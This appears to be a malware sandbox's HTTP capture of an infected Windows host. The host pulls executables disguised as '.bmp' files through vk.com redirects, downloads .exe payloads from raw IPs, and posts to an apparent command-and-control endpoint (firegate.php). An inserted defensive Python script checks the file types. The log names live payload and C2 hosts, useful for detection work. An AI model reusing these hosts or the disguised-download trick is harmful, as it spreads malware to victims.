GET /doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#test HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: vk.com
Cache-Control: no-cache
Cookie: remixlang=17; remixstlid=9066415190589096709_7glS0yLxHjgUVDHuM51ZNMCXd8Z91lvtzM3x4OvTXlT; remixlgck=74ebe3b98cf3ddf455; remixstid=1927807604_CHdaewi2CJ3TqZk5GaSjFAhw6G1Vx5KRZM5DYfGuhrD
Response:
HTTP/1.1 200 OK
Server: kittenx
Date: Tue, 18 Jul 2023 00:59:11 GMT
Content-Type: text/html; charset=windows-1251
Content-Length: 240192
Connection: keep-alive
X-Powered-By: KPHP/7.4.114177
Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly
Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure
Cache-control: no-store
X-Robots-Tag: noindex,nofollow
Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline'
X-XSS-Protection: 1; report=/xss_reports
X-Frame-Options: deny
X-Frontend: front605106
Strict-Transport-Security: max-age=15768000
Access-Control-Expose-Headers: X-Frontend
GET 302 https://vk.com/doc808950829_664402789?hash=p2AcukYoSYRh3R7HrdzDlmRExK7FwDhZPzjD3FbEXb0&dl=mCy6gA7S91auE1MrYaS4hBwW7fCACazMjt4KNbkHoYX&api=1&no_preview=1#setup
Request:
GET /doc808950829_664402789?hash=p2AcukYoSYRh3R7HrdzDlmRExK7FwDhZPzjD3FbEXb0&dl=mCy6gA7S91auE1MrYaS4hBwW7fCACazMjt4KNbkHoYX&api=1&no_preview=1#setup HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: vk.com
Cache-Control: no-cache
Cookie: remixlang=17; remixstlid=9066415190589096709_7glS0yLxHjgUVDHuM51ZNMCXd8Z91lvtzM3x4OvTXlT; remixlgck=74ebe3b98cf3ddf455; remixstid=1927807604_CHdaewi2CJ3TqZk5GaSjFAhw6G1Vx5KRZM5DYfGuhrD
Response:
HTTP/1.1 302 Found
Server: kittenx
Date: Tue, 18 Jul 2023 00:59:15 GMT
Content-Type: text/html; charset=windows-1251
Content-Length: 0
Connection: keep-alive
X-Powered-By: KPHP/7.4.114177
Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly
Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly
Cache-control: no-store
X-Robots-Tag: noindex,nofollow
Location: https://sun6-20.userapi.com/c909628/u808950829/docs/d40/155c07867695/Setup.bmp?extra=-S2EoGHJnh2jeTB8HNKjYdnwj6Du8mGxwSQ5UwXAkSHl4SEgMe7AHfKHQSoKksDKstj1GGnkWJFmNoi9QOYZ8e9IMjZPi0WzPb6OAV9f8lILm4OGTxxjN_r7Vbv6LV2z0coNyj6nAhRG5sQHZg
X-Frontend: front605106
Strict-Transport-Security: max-age=15768000
Access-Control-Expose-Headers: X-Frontend
GET 302 https://vk.com/doc808950829_664295976?hash=wWP2uKSW6vc2Zwh4dERWVq2558nuK0zAmie4S5babxg&dl=fnVWutUVH5EHCOnwUxAqrClRC7zCIeOyomm4pfSrZFc&api=1&no_preview=1#rise_test
Request:
GET /doc808950829_664295976?hash=wWP2uKSW6vc2Zwh4dERWVq2558nuK0zAmie4S5babxg&dl=fnVWutUVH5EHCOnwUxAqrClRC7zCIeOyomm4pfSrZFc&api=1&no_preview=1#rise_test HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: vk.com
Cache-Control: no-cache
Cookie: remixlang=17; remixstlid=9066415190589096709_7glS0yLxHjgUVDHuM51ZNMCXd8Z91lvtzM3x4OvTXlT; remixlgck=74ebe3b98cf3ddf455; remixstid=1927807604_CHdaewi2CJ3TqZk5GaSjFAhw6G1Vx5KRZM5DYfGuhrD
Response:
HTTP/1.1 302 Found
Server: kittenx
Date: Tue, 18 Jul 2023 00:59:16 GMT
Content-Type: text/html; charset=windows-1251
Content-Length: 0
Connection: keep-alive
X-Powered-By: KPHP/7.4.114177
Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly
Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly
Cache-control: no-store
X-Robots-Tag: noindex,nofollow
Location: https://sun6-22.userapi.com/c237031/u808950829/docs/d38/9e626a273537/RisePro_0_2_9rOsvaKa1eDf138eBlTl.bmp?extra=5LvyYRmmLl8tdr8Ya5heHfIfMdNgEKGJCbWFSF2a8RiEodeqwnr-q-HLR8RKKd2ySEMTj4qUMPDE1d5V4NAVgNgh34oW-WAd_uO8rIsPGOWjP5z8ZR7X4pJy84WcJR9vNu5NKPpGxVHYL4Wz_g
X-Frontend: front605106
Strict-Transport-Security: max-age=15768000
Access-Control-Expose-Headers: X-Frontend
GET 200 https://sun6-22.userapi.com/c237031/u808950829/docs/d38/9e626a273537/RisePro_0_2_9rOsvaKa1eDf138eBlTl.bmp?extra=5LvyYRmmLl8tdr8Ya5heHfIfMdNgEKGJCbWFSF2a8RiEodeqwnr-q-HLR8RKKd2ySEMTj4qUMPDE1d5V4NAVgNgh34oW-WAd_uO8rIsPGOWjP5z8ZR7X4pJy84WcJR9vNu5NKPpGxVHYL4Wz_g
Request:
GET /c237031/u808950829/docs/d38/9e626a273537/RisePro_0_2_9rOsvaKa1eDf138eBlTl.bmp?extra=5LvyYRmmLl8tdr8Ya5heHfIfMdNgEKGJCbWFSF2a8RiEodeqwnr-q-HLR8RKKd2ySEMTj4qUMPDE1d5V4NAVgNgh34oW-WAd_uO8rIsPGOWjP5z8ZR7X4pJy84WcJR9vNu5NKPpGxVHYL4Wz_g HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: sun6-22.userapi.com
Cache-Control: no-cache
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Server: kittenx
Date: Tue, 18 Jul 2023 00:59:16 GMT
Content-Type: image/x-ms-bmp
Content-Length: 1024516
Connection: keep-alive
Last-Modified: Sat, 15 Jul 2023 10:36:35 GMT
ETag: "64b276b3-fa204"
Expires: Thu, 17 Aug 2023 00:59:16 GMT
Cache-Control: max-age=2592000
X-Frontend: front6-22
Access-Control-Expose-Headers: X-Frontend
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, HEAD, OPTIONS
Strict-Transport-Security: max-age=15768000
Access-Control-Allow-Headers: X-Quic
Timing-Allow-Origin: *
Accept-Ranges: bytes
GET 200 https://sun6-20.userapi.com/c909628/u808950829/docs/d40/155c07867695/Setup.bmp?extra=-S2EoGHJnh2jeTB8HNKjYdnwj6Du8mGxwSQ5UwXAkSHl4SEgMe7AHfKHQSoKksDKstj1GGnkWJFmNoi9QOYZ8e9IMjZPi0WzPb6OAV9f8lILm4OGTxxjN_r7Vbv6LV2z0coNyj6nAhRG5sQHZg
Request:
GET /c909628/u808950829/docs/d40/155c07867695/Setup.bmp?extra=-S2EoGHJnh2jeTB8HNKjYdnwj6Du8mGxwSQ5UwXAkSHl4SEgMe7AHfKHQSoKksDKstj1GGnkWJFmNoi9QOYZ8e9IMjZPi0WzPb6OAV9f8lILm4OGTxxjN_r7Vbv6LV2z0coNyj6nAhRG5sQHZg HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: sun6-20.userapi.com
Cache-Control: no-cache
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Server: kittenx
Date: Tue, 18 Jul 2023 00:59:16 GMT
Content-Type: image/x-ms-bmp
Content-Length: 1799372
Connection: keep-alive
Last-Modified: Mon, 17 Jul 2023 19:04:08 GMT
ETag: "64b590a8-1b74cc"
Expires: Thu, 17 Aug 2023 00:59:16 GMT
Cache-Control: max-age=2592000
X-Frontend: front6-20
Access-Control-Expose-Headers: X-Frontend
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, HEAD, OPTIONS
Strict-Transport-Security: max-age=15768000
Access-Control-Allow-Headers: X-Quic
Timing-Allow-Origin: *
Accept-Ranges: bytes
GET 302 https://vk.com/doc808950829_664352898?hash=TpvyQqEeYsjdodWTHrXtKlZqBTWVZrPRit56oUnvQNg&dl=sD0PBsoT1zBUSEgqcJWb3g6HPzuBQ8Yjvhr8mqZxT94&api=1&no_preview=1
Request:
GET /doc808950829_664352898?hash=TpvyQqEeYsjdodWTHrXtKlZqBTWVZrPRit56oUnvQNg&dl=sD0PBsoT1zBUSEgqcJWb3g6HPzuBQ8Yjvhr8mqZxT94&api=1&no_preview=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: vk.com
Cache-Control: no-cache
Cookie: remixlang=17; remixstlid=9066415190589096709_7glS0yLxHjgUVDHuM51ZNMCXd8Z91lvtzM3x4OvTXlT; remixlgck=74ebe3b98cf3ddf455; remixstid=1927807604_CHdaewi2CJ3TqZk5GaSjFAhw6G1Vx5KRZM5DYfGuhrD
Response:
HTTP/1.1 302 Found
Server: kittenx
Date: Tue, 18 Jul 2023 00:59:16 GMT
Content-Type: text/html; charset=windows-1251
Content-Length: 0
Connection: keep-alive
X-Powered-By: KPHP/7.4.114177
Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly
Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly
Cache-control: no-store
X-Robots-Tag: noindex,nofollow
Location: https://sun6-22.userapi.com/c909218/u808950829/docs/d53/96be74f81b36/h8d337t1s6ya.bmp?extra=iMdiTqwVj_onJ1LuJ6We14YTEDYuZM_Brr62lq1KsudjEwrtFjIQd3BREwt3fIEGp47rx_msY26ho4sjG3gY49shmqDAGw2CWv26UfCwNeR69DZ5bz3anb_z_mrjE9i5yhj71xHRwlb5AsalzQ
X-Frontend: front605106
Strict-Transport-Security: max-age=15768000
Access-Control-Expose-Headers: X-Frontend
GET 200 https://sun6-22.userapi.com/c909218/u808950829/docs/d53/96be74f81b36/h8d337t1s6ya.bmp?extra=iMdiTqwVj_onJ1LuJ6We14YTEDYuZM_Brr62lq1KsudjEwrtFjIQd3BREwt3fIEGp47rx_msY26ho4sjG3gY49shmqDAGw2CWv26UfCwNeR69DZ5bz3anb_z_mrjE9i5yhj71xHRwlb5AsalzQ
Request:
GET /c909218/u808950829/docs/d53/96be74f81b36/h8d337t1s6ya.bmp?extra=iMdiTqwVj_onJ1LuJ6We14YTEDYuZM_Brr62lq1KsudjEwrtFjIQd3BREwt3fIEGp47rx_msY26ho4sjG3gY49shmqDAGw2CWv26UfCwNeR69DZ5bz3anb_z_mrjE9i5yhj71xHRwlb5AsalzQ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: sun6-22.userapi.com
Cache-Control: no-cache
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Server: kittenx
Date: Tue, 18 Jul 2023 00:59:17 GMT
Content-Type: image/x-ms-bmp
Content-Length: 701444
Connection: keep-alive
Last-Modified: Sun, 16 Jul 2023 16:59:45 GMT
ETag: "64b42201-ab404"
Expires: Thu, 17 Aug 2023 00:59:17 GMT
Cache-Control: max-age=2592000
X-Frontend: front6-22
Access-Control-Expose-Headers: X-Frontend
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, HEAD, OPTIONS
Strict-Transport-Security: max-age=15768000
Access-Control-Allow-Headers: X-Quic
Timing-Allow-Origin: *
Accept-Ranges: bytes
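The exchanges above show a repeating pattern: a vk.com /doc... request is answered with a 302 whose Location is a ".bmp" on sun6-20 or sun6-22.userapi.com, and that file is then served as image/x-ms-bmp with a Content-Length between about 0.7 and 6.8 MB (PMmp.bmp, Setup.bmp, RisePro_0_2_...bmp, h8d337t1s6ya.bmp), next to a direct download of setup294.exe as application/x-msdos-program. Two further details are worth checking by hand: the request lines carry the URL fragment (#setup, #rise_test, #stats, #test), which no browser sends, and an image served by a CDN cannot be trusted to be an image until its first bytes are compared with the declared type. The script below is an added example, not part of this report and not code from the sandbox: it reconstructs the redirect chains from the captured exchanges, flags executable content types, compares the declared BMP type with the body's magic bytes and with the size field in the BMP file header, and notes fragments in request-targets. The response bodies are not reproduced on the page, so the bodies attached in build_capture() are constructed for illustration; the executable-type list is an assumption.

```python
"""Checks on captured HTTP exchanges: redirect chains, content-type vs. magic bytes,
BMP header size vs. Content-Length, and fragments sent in request lines.

Added example; not part of the original report. URLs and headers are copied from the
capture above; bodies are constructed because the capture does not include them.
"""
from __future__ import annotations

import struct
from dataclasses import dataclass

# Content types that mean "a Windows program", whatever the file name says (assumed list).
EXECUTABLE_TYPES = {"application/x-msdos-program", "application/x-dosexec",
                    "application/vnd.microsoft.portable-executable"}
MAGIC = [(b"MZ", "pe"), (b"BM", "bmp"), (b"\x7fELF", "elf"), (b"PK\x03\x04", "zip")]
EXPECTED_KIND = {"image/x-ms-bmp": "bmp", "image/bmp": "bmp",
                 "application/x-msdos-program": "pe"}

# URLs copied from the capture above.
SETUP_DOC = "https://vk.com/doc808950829_664402789?hash=p2AcukYoSYRh3R7HrdzDlmRExK7FwDhZPzjD3FbEXb0&dl=mCy6gA7S91auE1MrYaS4hBwW7fCACazMjt4KNbkHoYX&api=1&no_preview=1#setup"
SETUP_BMP = "https://sun6-20.userapi.com/c909628/u808950829/docs/d40/155c07867695/Setup.bmp?extra=-S2EoGHJnh2jeTB8HNKjYdnwj6Du8mGxwSQ5UwXAkSHl4SEgMe7AHfKHQSoKksDKstj1GGnkWJFmNoi9QOYZ8e9IMjZPi0WzPb6OAV9f8lILm4OGTxxjN_r7Vbv6LV2z0coNyj6nAhRG5sQHZg"
RISE_DOC = "https://vk.com/doc808950829_664295976?hash=wWP2uKSW6vc2Zwh4dERWVq2558nuK0zAmie4S5babxg&dl=fnVWutUVH5EHCOnwUxAqrClRC7zCIeOyomm4pfSrZFc&api=1&no_preview=1#rise_test"
RISE_BMP = "https://sun6-22.userapi.com/c237031/u808950829/docs/d38/9e626a273537/RisePro_0_2_9rOsvaKa1eDf138eBlTl.bmp?extra=5LvyYRmmLl8tdr8Ya5heHfIfMdNgEKGJCbWFSF2a8RiEodeqwnr-q-HLR8RKKd2ySEMTj4qUMPDE1d5V4NAVgNgh34oW-WAd_uO8rIsPGOWjP5z8ZR7X4pJy84WcJR9vNu5NKPpGxVHYL4Wz_g"


@dataclass
class Exchange:
    method: str
    status: int
    url: str            # request URL exactly as captured (fragment included)
    resp: dict          # response headers as captured
    body: bytes = b""   # not in the capture; constructed where set


def header(ex: Exchange, name: str):
    return next((v for k, v in ex.resp.items() if k.lower() == name.lower()), None)


def resource(url: str) -> str:
    """Matching key for Location vs. a later request: the URL without its fragment."""
    return url.split("#", 1)[0]


def make_bmp(total_size: int) -> bytes:
    """Constructed minimal BMP: 14-byte file header carrying total_size, zero padded."""
    hdr = struct.pack("<2sIHHI", b"BM", total_size, 0, 0, 54)
    return hdr + bytes(max(0, total_size - len(hdr)))


def sniff(body: bytes) -> str:
    return next((kind for magic, kind in MAGIC if body.startswith(magic)), "unknown")


def follow_chains(exchanges: list) -> list:
    """For every 302, follow Location to the later request for the same resource."""
    by_url = {resource(e.url): e for e in exchanges}
    chains = []
    for e in exchanges:
        if e.status != 302:
            continue
        chain, seen = [e], set()
        while chain[-1].status == 302:
            nxt = by_url.get(resource(header(chain[-1], "Location") or ""))
            if nxt is None or nxt.url in seen:
                break               # redirect target not fetched, or a loop
            seen.add(nxt.url)
            chain.append(nxt)
        chains.append(chain)
    return chains


def check(ex: Exchange) -> list:
    """Findings for one exchange, in a fixed order."""
    findings = []
    ctype = (header(ex, "Content-Type") or "").split(";")[0].strip().lower()
    if ctype in EXECUTABLE_TYPES:
        findings.append(f"executable content-type ({ctype})")
    if ex.body:
        kind, want = sniff(ex.body), EXPECTED_KIND.get(ctype)
        if want and kind != want:
            findings.append(f"declared {ctype} but body looks like {kind}")
        if kind == "bmp" and len(ex.body) >= 6:
            size = struct.unpack_from("<I", ex.body, 2)[0]   # BMP file-size field
            clen = header(ex, "Content-Length")
            if clen and int(clen) != size:
                findings.append(f"bmp header size {size} != Content-Length {clen}")
    if "#" in ex.url:
        findings.append("fragment sent in request-target (not browser behaviour)")
    return findings


def analyse(exchanges: list) -> list:
    return [(e.url, check(e)) for e in exchanges]


def build_capture() -> list:
    """Five exchanges transcribed from the capture above; the two bodies are constructed."""
    html = {"Content-Type": "text/html; charset=windows-1251", "Content-Length": "0"}
    return [
        Exchange("GET", 200, "https://camoverde.pw/setup294.exe",
                 {"Content-Type": "application/x-msdos-program", "Content-Length": "1718034"}),
        Exchange("GET", 302, SETUP_DOC, dict(html, Location=SETUP_BMP)),
        Exchange("GET", 200, SETUP_BMP, {"Content-Type": "image/x-ms-bmp", "Content-Length": "1799372"},
                 body=b"MZ\x90\x00" + bytes(60)),   # constructed: PE magic behind an image type
        Exchange("GET", 302, RISE_DOC, dict(html, Location=RISE_BMP)),
        Exchange("GET", 200, RISE_BMP, {"Content-Type": "image/x-ms-bmp", "Content-Length": "1024516"},
                 body=make_bmp(70)),                 # constructed: genuine BMP header, wrong size
    ]


if __name__ == "__main__":
    capture = build_capture()
    for chain in follow_chains(capture):
        print(" -> ".join(f"{e.status} {resource(e.url)[:60]}" for e in chain))
    for url, findings in analyse(capture):
        for f in findings:
            print(f"{f}: {url[:60]}")
```

With the real bodies from the sandbox's PCAP in place of the constructed ones, the same two checks settle whether the ".bmp" files are bitmaps or renamed executables; until then the page only supports the weaker statement that multi-megabyte files with image extensions were fetched through vk.com document redirects.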
GET 200 https://db-ip.com/demo/home.php?s=175.208.134.152
Request:
GET /demo/home.php?s=175.208.134.152 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: db-ip.com
Response:
HTTP/1.1 200 OK
Date: Tue, 18 Jul 2023 00:59:50 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
X-IPLB-Request-ID: AC46E951:7B96_93878F2E:0050_64B5E406_1CDD3C6E:2467C
X-IPLB-Instance: 30783
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=D%2BGPURoci2gOD%2B6QdLq4PuVcT7Squ3k%2BOA1lUmRJf8CrKoG1kpOlcaXwgrIttyrO1qU9Em%2BBDvtDcPs9eVTbHnFWghp%2FvA5VMsHs3V0RrIqTZz675KNQbuzCrw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7e86c8c47c54837f-KIX
alt-svc: h3=":443"; ma=86400
GET 200 https://db-ip.com/
GET / HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: db-ip.com
HTTP/1.1 200 OK
Date: Tue, 18 Jul 2023 00:59:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-control: max-age=28800
X-IPLB-Request-ID: AC4631A3:DFBE_93878F2E:0050_64B5E407_1CD8184B:2467B
X-IPLB-Instance: 30783
CF-Cache-Status: MISS
Last-Modified: Tue, 18 Jul 2023 00:59:51 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sYa%2FwBSw2KazZAgsoQc65mbPR2xf1PTll9U%2FOPH8bCavkT9brrmdYXOz2lXbwxY9dbMj6pOEHt8fq8ZedO03kTba%2B63IZhcw1MzvB0DFOZLONnzQ6wlng9itIA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7e86c8ccfe770ad2-KIX
alt-svc: h3=":443"; ma=86400
POST 200 https://api.db-ip.com/v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self
POST /v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self HTTP/1.1
Connection: Keep-Alive
Referer: https://db-ip.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 0
Host: api.db-ip.com
HTTP/1.1 200 OK
Date: Tue, 18 Jul 2023 00:59:52 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: http*://*db-ip.com
Cache-control: max-age=180
X-IPLB-Request-ID: 8D655683:310C_93878F2E:0050_64B5E408_1CD30E35:2467A
X-IPLB-Instance: 30783
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gGXMpbt86KNbG9hJSKAIo%2FpScnpMkrbZ5QVApwCZRyWKPZzMwe0zRb0nXn0OvDEbM1Z4ZrYlK2eolZFvAEBw6urZSaLBIaBHRyJ83AWB3cyTzhmXmWzWruRgVS6Ju0o%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7e86c8d36c7819f8-KIX
alt-svc: h3=":443"; ma=86400
GET 200 http://208.67.104.60/api/tracemap.php
GET /api/tracemap.php HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 208.67.104.60
HTTP/1.1 200 OK
Date: Tue, 18 Jul 2023 00:58:55 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Content-Length: 15
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST 200 http://208.67.104.60/api/firegate.php
POST /api/firegate.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 133
Host: 208.67.104.60
HTTP/1.1 200 OK
Date: Tue, 18 Jul 2023 00:58:56 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Content-Length: 108
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST 200 http://208.67.104.60/api/firegate.php
POST /api/firegate.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 133
Host: 208.67.104.60
HTTP/1.1 200 OK
Date: Tue, 18 Jul 2023 00:59:02 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Content-Length: 4160
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
HEAD 200 http://77.91.124.40/info/photo540.exe
HEAD /info/photo540.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 77.91.124.40
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 526848
Content-Type: application/octet-stream
Last-Modified: Tue, 18 Jul 2023 08:56:29 GMT
Accept-Ranges: bytes
ETag: "267937be55b9d91:0"
Server: Microsoft-IIS/10.0
Date: Tue, 18 Jul 2023 08:59:01 GMT
HEAD 200 http://87.120.88.198/g.exe
HEAD /g.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 87.120.88.198
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 18 Jul 2023 00:59:03 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Tue, 18 Jul 2023 00:45:02 GMT
ETag: "55000-600b839b1bfd9"
Accept-Ranges: bytes
Content-Length: 348160
Content-Type: application/x-msdos-program
GET 200 http://apps.identrust.com/roots/dstrootcax3.p7c
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Wed, 08 Feb 2023 16:52:56 GMT
ETag: "37d-5f433188daa00"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Tue, 18 Jul 2023 01:59:03 GMT
Date: Tue, 18 Jul 2023 00:59:03 GMT
Connection: keep-alive
GET 200 http://87.120.88.198/g.exe
GET /g.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 87.120.88.198
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 18 Jul 2023 00:59:03 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Tue, 18 Jul 2023 00:45:02 GMT
ETag: "55000-600b839b1bfd9"
Accept-Ranges: bytes
Content-Length: 348160
Content-Type: application/x-msdos-program
GET 200 http://77.91.124.40/info/photo540.exe
GET /info/photo540.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 77.91.124.40
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 18 Jul 2023 08:56:29 GMT
Accept-Ranges: bytes
ETag: "267937be55b9d91:0"
Server: Microsoft-IIS/10.0
Date: Tue, 18 Jul 2023 08:59:02 GMT
Content-Length: 526848
HEAD 200 http://hugersi.com/dl/6523.exe
HEAD /dl/6523.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: hugersi.com
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Tue, 18 Jul 2023 00:59:04 GMT
Content-Type: application/octet-stream
Content-Length: 248320
Last-Modified: Tue, 18 Jul 2023 00:30:02 GMT
Connection: keep-alive
ETag: "64b5dd0a-3ca00"
Accept-Ranges: bytes
HEAD 200 http://zzz.fhauiehgha.com/m/okka25.exe
HEAD /m/okka25.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: zzz.fhauiehgha.com
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jul 2023 00:59:04 GMT
Content-Type: application/octet-stream
Content-Length: 732672
Last-Modified: Mon, 17 Jul 2023 15:18:37 GMT
